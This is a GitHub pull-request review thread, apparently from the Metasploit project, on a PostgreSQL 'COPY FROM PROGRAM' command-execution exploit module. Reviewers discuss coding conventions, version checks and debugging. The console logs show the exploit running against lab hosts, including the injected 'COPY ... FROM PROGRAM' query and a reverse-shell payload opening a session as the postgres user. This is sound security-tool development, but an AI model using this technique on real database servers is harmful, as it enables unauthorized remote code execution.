          'Arch'       => [ARCH_CMD],
          'Payload' => {
            'Compat'     => {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'adduser, generic'
            }
          }
        ],
```

---

It's very rare that a module specifies a `COMMAND` as a module option outside of a target. This is usually used only when exploitation is complicated, where the target environment is restricted (ie, embedded devices), where traditional exploitation may fail, or as a contrasting option to a command stager.

You miss out on useful features such as encoders.

It also increases the complexity of maintenance, albeit only slightly.

It's also a confusing user experience to `set` a `COMMAND` which will override any future payload selections until such time as the `COMMAND` is `unset`.

```
# grep -rn COMMAND modules/exploits/ | grep Opt
modules/exploits/windows/local/run_as.rb:45:        OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]),
modules/exploits/windows/local/run_as.rb:46:        OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ])
modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb:70:        OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
modules/exploits/windows/local/wmi_persistence.rb:73:        OptString.new('CUSTOM_PS_COMMAND',
```

```
# grep -rn CMD modules/exploits/ | grep Opt
modules/exploits/unix/webapp/generic_exec.rb:43:        OptString.new('CMDURI', [true, "The full URI path with the XXcmdXX parameter", "/cgi-bin/generic?cmd=XXcmdXX"]),
modules/exploits/unix/webapp/oracle_vm_agent_utl.rb:54:        OptString.new('CMD', [ false,  "A single command to execute instead of the payload" ]),
modules/exploits/windows/local/ms10_092_schelevator.rb:50:      OptString.new("CMD",      [ false, "Command to execute instead of a payload" ]),
modules/exploits/windows/iis/ms01_026_dbldecode.rb:49:        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
modules/exploits/windows/antivirus/ams_hndlrsvc.rb:47:        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
modules/exploits/windows/antivirus/ams_xfr.rb:48:        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
modules/exploits/windows/http/osb_uname_jlist.rb:51:        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb:50:        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
modules/exploits/windows/mssql/mssql_payload_sqli.rb:91:        OptEnum.new('DELIVERY', [true, 'Payload delivery method', 'OLD', ['PS', 'CMD', 'OLD']])
modules/exploits/windows/browser/ie_unsafe_scripting.rb:90:           OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']])
modules/exploits/windows/misc/altiris_ds_sqli.rb:58:      OptBool.new('XP_CMDSHELL',      [ true, "Enable xp_cmdshell prior to exploit", true]),
modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb:58:        OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
modules/exploits/linux/misc/nagios_nrpe_arguments.rb:61:        OptEnum.new('NRPECMD', [
modules/exploits/multi/http/struts_code_exec.rb:62:          OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
modules/exploits/multi/http/vbseo_proc_deutf.rb:47:        OptString.new('CMD', [false, "Command to execute"])
modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb:71:      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb:70:          OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb:192:        OptString.new('CMD',      [false, 'command to run on the target. If this option is specified the payload will be ignored.'])
```

Of the above, a bunch are false positive matches, some are embedded devices, some are very old and were poorly implemented, and the others are an alternative to using a command stager.

2019-03-25 16:08 UTC, wvu-r7 commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
I agree with everything @bcoles has stated here.

Unless there's a good reason to break convention, let's stick with `cmd/unix/generic`. The maintenance cost of supporting wildly varying options is already too high. And guess who has to maintain the code? :-)

If you'd like, you can add a separate target for `cmd/unix/generic`. Call it "arbitrary shell command" or something.

2019-03-26 18:54 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +  def vuln_version?
Resolve I think, please double check!

2019-03-26 18:55 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Resolved along with the gem check

2019-03-26 19:00 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Done! removed command variable & added in the Windows CMD option

2019-03-26 19:01 UTC, Greenwolf commented
I believe everything is now resolved, please let me know if i missed anything. Looks so much better now, thank you @bcoles & @wvu-r7

2019-03-26 19:06 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Appears to be fixed.

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > rcheck 
[*] Reloading module...

[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 - The target appears to be vulnerable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
```

However, there's a duplicate empty `def vuln_version?` method on line 119 which should be removed.

2019-03-26 19:15 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
It seems there's some discrepancies with the way the auth is handled. Not an issue with this PR - the other PostgreSQL module likely does this too.

Documenting it here for reference. Note, in the below output, the correct credentials are `msf:msf`. The `check` method fails with incorrect credentials then succeeds with correct credentials. This is expected. What's unexpected, is the `check` method continues to correctly retrieve the version banner after changing the credentials to invalid credentials.

```
msf5 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec 
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:unknown=>"Mpassword authentication failed for user \"postgres\":Fauth.c:L328"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password asdf
password => asdf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:unknown=>"Mpassword authentication failed for user \"postgres\":Fauth.c:L328"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username asdf
username => asdf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:unknown=>"Mpassword authentication failed for user \"asdf\":Fauth.c:L328"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set database asdf
database => asdf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:unknown=>"Mpassword authentication failed for user \"asdf\":Fauth.c:L328"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username msf
username => msf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:unknown=>"Mpassword authentication failed for user \"msf\":Fauth.c:L328"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password msf
password => msf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:unknown=>"Mdatabase \"asdf\" does not exist:Fpostinit.c:L846"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > unset database 
Unsetting database...
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
[-] Check failed: Msf::OptionValidateError The following options failed to validate: DATABASE.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set database template1
database => template1
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:auth=>"PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit"}
[*] 127.0.0.1:5432 - The target appears to be vulnerable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password asdjfhlakjsdfhklajshdf
password => asdjfhlakjsdfhklajshdf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:auth=>"PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit"}
[*] 127.0.0.1:5432 - The target appears to be vulnerable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username aksjdhglkasdfh
username => aksjdhglkasdfh
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check
{:auth=>"PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit"}
[*] 127.0.0.1:5432 - The target appears to be vulnerable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
```

A cursory glance indicates that the PostgreSQL library may be keeping the socket open for reuse.

```
# netstat -an | grep 5432
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:5432          127.0.0.1:44915         ESTABLISHED
tcp        0      0 127.0.0.1:44915         127.0.0.1:5432          ESTABLISHED   # <-- still established
tcp6       0      0 ::1:5432                :::*                    LISTEN     
tcp6       0      0 ::1:43030               ::1:5432                ESTABLISHED
tcp6       0      0 ::1:5432                ::1:43014               ESTABLISHED
tcp6       0      0 ::1:43014               ::1:5432                ESTABLISHED
tcp6       0      0 ::1:5432                ::1:43030               ESTABLISHED
unix  2      [ ACC ]     STREAM     LISTENING     1194031  /var/run/postgresql/.s.PGSQL.5432
```

2019-03-26 19:55 UTC, wvu-r7 commented
I'll take a look. Thanks!

2019-03-26 20:16 UTC, bcoles reviewed
```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb:108 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb:118 - [WARNING] Spaces at EOL
------------------------------------------------------------------------
```

2019-03-26 20:16 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +  def vuln_version?
Remove empty method.

2019-03-26 20:16 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +  def postgres_minor_version(version)
Remove unused method.

2019-03-26 20:16 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +  def postgres_version(version)
Remove unused method.

2019-03-26 20:16 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +  def vuln_version?
```suggestion
  def vuln_version?
```

2019-03-26 20:16 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +
```suggestion

```

2019-03-26 20:21 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Awesome, i removed those functions, can't believe you minimised the code so much with that Gem::Version & version auth flatten. Great stuff 😁

2019-03-26 21:45 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
I've fixed up the version detection in the other PostgreSQL module in #11636

I also added a `vprint` message to print the version, as this may be useful to the user. You could also add it to this module.

```ruby
vprint_status version[:auth].to_s
```

2019-03-27 10:40 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Done thanks!

2019-03-27 10:41 UTC, Greenwolf commented
All suggested changes are once again implemented, ready for a final review

2019-03-29 11:01 UTC, Greenwolf commented
@wvu-r7 How is it looking?

2019-03-29 20:33 UTC, bcoles commented
@msjenkins-r7 test this please

2019-03-29 21:17 UTC, wvu-r7 commented
@Greenwolf: Getting to it, mate. Sorry for the delay! I'm getting #11636 done with this.

2019-04-01 17:43 UTC, wvu-r7 commented
@Greenwolf: I've completed my interim tasks and am working on this now. Thanks!

2019-04-07 23:18 UTC, Greenwolf commented
Hi @wvu-r7, that's great to hear, did you need me to do anything more with this?

2019-04-07 23:22 UTC, Greenwolf commented
updated documentation & description with correct required permission group if not superuser.

2019-04-11 16:49 UTC, wvu-r7 commented
A likely regression in the module:

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:5433 - 127.0.0.1:5433 Postgres - querying with 'select version()'
[*] 127.0.0.1:5433 - 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5433 - Exploiting...
[*] 127.0.0.1:5433 - 127.0.0.1:5433 Postgres - querying with 'DROP TABLE IF EXISTS 3xw3ogfPgY;'

From: /rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb @ line 127 Msf::Modules::Exploit__Multi__Postgres__Postgres_copy_from_program_cmd_exec::MetasploitModule#execute_payload:

    122:
    123:   def execute_payload
    124:     # Drop table if it exists
    125:     query = "DROP TABLE IF EXISTS #{tablename};"
    126:     drop_query = postgres_query(query)
 => 127:     require 'pry'; binding.pry
    128:     case drop_query.keys[0]
    129:     when :conn_error
    130:       print_error "#{peer} - Connection error"
    131:       return false
    132:     when :sql_error

[1] pry(#<Msf::Modules::Exploit__Multi__Postgres__Postgres_copy_from_program_cmd_exec::MetasploitModule>)> drop_query
=> {:sql_error=>"VERROR SQL statement 'DROP TABLE IF EXISTS 3xw3ogfPgY;' returns #<RuntimeError: ERROR\tVERROR\tC42601\tMsyntax error at or near \"3\"\tP22\tFscan.l\tL1128\tRscanner_yyerror>"}
[2] pry(#<Msf::Modules::Exploit__Multi__Postgres__Postgres_copy_from_program_cmd_exec::MetasploitModule>)>
```

Initial commit has syntax errors:

```
[-] WARNING! The following modules could not be loaded!
[-] 	/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
[-] Please see /Users/wvu/.msf4/logs/framework.log for details.
```

```
[04/11/2019 11:35:21] [e(0)] core: /rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb failed to load due to the following error: SyntaxError /rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:43: syntax error, unexpected tSTRING_BEG, expecting ')'
      'Platform' => %w(linux unix wi...
      ^
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:43: syntax error, unexpected =>, expecting end
      'Platform' => %w(linux unix win osx),
                 ^~
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:43: syntax error, unexpected ',', expecting end
...orm' => %w(linux unix win osx),
...                              ^
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:44: syntax error, unexpected =>, expecting end
      'Payload' => {
                ^~
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:46: syntax error, unexpected =>, expecting end
      'Arch' => [ARCH_CMD],
             ^~
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:46: syntax error, unexpected ',', expecting end
      'Arch' => [ARCH_CMD],
                          ^
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:47: syntax error, unexpected =>, expecting end
      'Targets' => [
                ^~
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:49: syntax error, unexpected ',', expecting end
      ],
       ^
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:50: syntax error, unexpected =>, expecting end
      'DefaultTarget' => 0,
                      ^~
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:51: syntax error, unexpected =>, expecting end
      'DisclosureDate' => 'Feb 24 2019'
                       ^~
/rapid7/metasploit-framework/modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:52: syntax error, unexpected ')', expecting end
    ))
    ^ Call stack: /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:51:in `module_eval' /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:51:in `module_eval_with_lexical_scope' /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:140:in `block in load_module' /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:561:in `namespace_module_transaction' /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:178:in `load_module' /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:246:in `block in load_modules' /rapid7/metasploit-framework/lib/msf/core/modules/loader/directory.rb:49:in `block (2 levels) in each_module_reference_name' /Users/wvu/.rbenv/versions/2.6.2/lib/ruby/gems/2.6.0/gems/rex-core-0.1.13/lib/rex/file.rb:133:in `block in find' /Users/wvu/.rbenv/versions/2.6.2/lib/ruby/gems/2.6.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `catch' /Users/wvu/.rbenv/versions/2.6.2/lib/ruby/gems/2.6.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `find' /rapid7/metasploit-framework/lib/msf/core/modules/loader/directory.rb:40:in `block in each_module_reference_name' /rapid7/metasploit-framework/lib/msf/core/modules/loader/directory.rb:30:in `foreach' /rapid7/metasploit-framework/lib/msf/core/modules/loader/directory.rb:30:in `each_module_reference_name' /rapid7/metasploit-framework/lib/msf/core/modules/loader/base.rb:245:in `load_modules' /rapid7/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules' /rapid7/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each' /rapid7/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules' /rapid7/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path' /rapid7/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each' /rapid7/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path' /rapid7/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths' /rapid7/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each' /rapid7/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths' /rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:161:in `initialize' /rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new' /rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver' /rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /rapid7/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' ./msfconsole:49:in `<main>'
```

Works when fixed (and with `SELECT` enabled):

```
msf5 exploit(multi/postgres/postgres_cmd_execution_nine_three) > rerun
[*] Reloading module...

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP double handler on 127.0.0.1:4444
[*] 127.0.0.1:5433 - Exploiting...
[*] 127.0.0.1:5433 - 127.0.0.1:5433 Postgres - querying with 'select version()'
[*] 127.0.0.1:5433 - 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5433 - 127.0.0.1:5433 Postgres - querying with 'DROP TABLE IF EXISTS msftesttable;'
[+] 127.0.0.1:5433 - 127.0.0.1:5433 - msftesttable dropped successfully
[*] 127.0.0.1:5433 - 127.0.0.1:5433 Postgres - querying with 'CREATE TABLE msftesttable(filename text);'
[+] 127.0.0.1:5433 - 127.0.0.1:5433 - msftesttable created successfully
[*] 127.0.0.1:5433 - 127.0.0.1:5433 Postgres - querying with 'COPY msftesttable FROM PROGRAM 'id';'
[+] 127.0.0.1 [...]

2019-04-11 16:59 UTC, wvu submitted a review, later dismissed

2019-04-11 16:59 UTC, wvu-r7 commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #query = "SELECT * FROM #{tablename};"
This block of code is useful and should be uncommented. You can make it optional if you desire.

2019-04-11 17:25 UTC, wvu-r7 commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #query = "SELECT * FROM #{tablename};"
Example:

https://github.com/rapid7/metasploit-framework/blob/8fcc36b6a09e754f07568538d14513bda066d856/modules/exploits/unix/webapp/drupal_restws_unserialize.rb#L81

https://github.com/rapid7/metasploit-framework/blob/8fcc36b6a09e754f07568538d14513bda066d856/modules/exploits/unix/webapp/drupal_restws_unserialize.rb#L151-L155

https://github.com/rapid7/metasploit-framework/blob/8fcc36b6a09e754f07568538d14513bda066d856/modules/exploits/unix/webapp/drupal_restws_unserialize.rb#L197

2019-04-12 10:53 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #query = "SELECT * FROM #{tablename};"
I've added a new option 'DUMP_TABLE_OUTPUT', and wrapped the commented code in an if statement for is it is true (default false).

2019-04-12 11:36 UTC, bcoles reviewed
```
0.16s$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb:81 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb:201 - [WARNING] Spaces at EOL
------------------------------------------------------------------------
```

2019-04-12 11:36 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
```suggestion
      OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
```

2019-04-12 11:36 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +
```suggestion

```

2019-04-12 12:56 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        This allows arbitary command execution as though you have console access.
```suggestion
        This allows arbitrary command execution as though you have console access.
```

2019-04-12 12:57 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        For Windows Systems command is placed in the COMMAND parameter, such as a powershell
This is no longer true

2019-04-12 12:57 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #query = "SELECT * FROM #{tablename};"
Please add `DUMP_TABLE_OUTPUT` to module documentation.

2019-04-12 13:04 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      print_status("Exploit Failed")
```suggestion
      print_error("Exploit Failed")
```

2019-04-12 16:42 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #query = "SELECT * FROM #{tablename};"
Done, and removed the old COMMAND documentation

2019-04-12 16:49 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        For Windows Systems command is placed in the COMMAND parameter, such as a powershell
updated, hope thats alright!

2019-04-12 16:49 UTC, Greenwolf commented
All changes applied

2019-04-12 20:10 UTC, bcoles requested changes
```
0.14s$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb:31 - [WARNING] Spaces at EOL
```

2019-04-12 20:10 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +
```suggestion

```

2019-04-12 20:50 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
```suggestion
        Alternatively target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
```

2019-04-12 20:53 UTC, bcoles submitted a review, later dismissed

2019-04-12 20:59 UTC, bcoles commented
I still haven't tested this module. Leaving it for @wvu-r7  

My only remaining observation is that `print_error "#{peer} - Unknown"` is used half a dozen times, but offers no insight into what went wrong. There's also not much in the way of `print` messages, making diagnosing what went wrong almost impossible without manually modifying the module, as the user is provided only `Unknown`.

For example. a failed exploit would return `trying exploit; error unknown; exploit failed` as the only feedback to the user regardless of where the exploitation failed. This is problematic for debugging purposes.

A more detailed error message in each instance would be nice.

2019-04-12 21:43 UTC, wvu-r7 commented
I last tested this exploit and found the latest commit did not work. The original commit worked if I fixed the syntax error within. See https://github.com/rapid7/metasploit-framework/pull/11598#issuecomment-482196539.

2019-04-15 17:01 UTC, Greenwolf commented
I'm having problems with my metasploit install breaking so I haven't been able to get to this. Could either of you please advise which line to change? i'm a bit confused my the previous linked comment.

2019-04-15 21:27 UTC, Greenwolf commented
Appears to be working for me

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           postgres         yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             192.168.0.25     yes       The target address range or CIDR identifier
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          iSpvelJiCi       yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.27     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.29
RHOSTS => 192.168.0.29
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.0.27:4444 
[*] 192.168.0.29:5432 - 192.168.0.29:5432 - PostgreSQL 10.7 (Ubuntu 10.7-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit
[*] 192.168.0.29:5432 - Exploiting...
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi dropped successfully
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi created successfully
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi copied successfully(valid syntax/command)
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi dropped successfully(Cleaned)
[*] 192.168.0.29:5432 - Exploit Succeeded
[*] Command shell session 1 opened (192.168.0.27:4444 -> 192.168.0.29:55890) at 2019-04-15 22:04:50 +0100

whoami
postgres
^C
Abort session 1? [y/N]  y
""

[*] 192.168.0.29 - Command shell session 1 closed.  Reason: User exit

```

2019-04-15 21:47 UTC, wvu-r7 commented
@Greenwolf: Can you test against https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 with this PR merged against `upstream/master`?

I do the following:

```
git fetch --all
git checkout upstream/master
git merge --no-ff --no-edit upstream/pr/11598
```

In your case, you can supply your own branch in place of the PR branch.

2019-04-16 20:38 UTC, Greenwolf commented
Hi @wvu-r7, I can't seem to checkout? I'm probably not doing it correctly:

```
$ git clone https://github.com/rapid7/metasploit-framework
Cloning into 'metasploit-framework'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 491869 (delta 6), reused 6 (delta 0), pack-reused 491851
Receiving objects: 100% (491869/491869), 386.05 MiB | 850.00 KiB/s, done.
Resolving deltas: 100% (360420/360420), done.
Checking out files: 100% (9723/9723), done.
$ cd metasploit-framework/
$ git fetch --all
Fetching origin
$ git checkout upstream/master
error: pathspec 'upstream/master' did not match any file(s) known to git
```

2019-04-16 20:46 UTC, wvu-r7 commented
If you cloned from `https://github.com/rapid7/metasploit-framework`, `origin` is `upstream`. You should work off your fork. Are you using the command line or the web UI?

2019-04-16 20:57 UTC, Greenwolf commented
I've done it from the web UI so far; forking, new files, edits

2019-04-16 21:01 UTC, wvu-r7 commented
> Add more commits by pushing to the postgres_cmd_execution_nine_three branch on Greenwolf/metasploit-framework.

Hmm, I have an idea to short-circuit my suggestion.

2019-04-16 21:05 UTC, wvu-r7 commented
```
wvu@kharak:/rapid7/metasploit-framework:HEAD$ git push-remote Greenwolf postgres_cmd_execution_nine_three
Counting objects: 2552, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (929/929), done.
Writing objects: 100% (2552/2552), 551.34 KiB | 6.72 MiB/s, done.
Total 2552 (delta 2021), reused 2095 (delta 1608)
remote: Resolving deltas: 100% (2021/2021), completed with 222 local objects.
To wvu-r7.github.com:Greenwolf/metasploit-framework
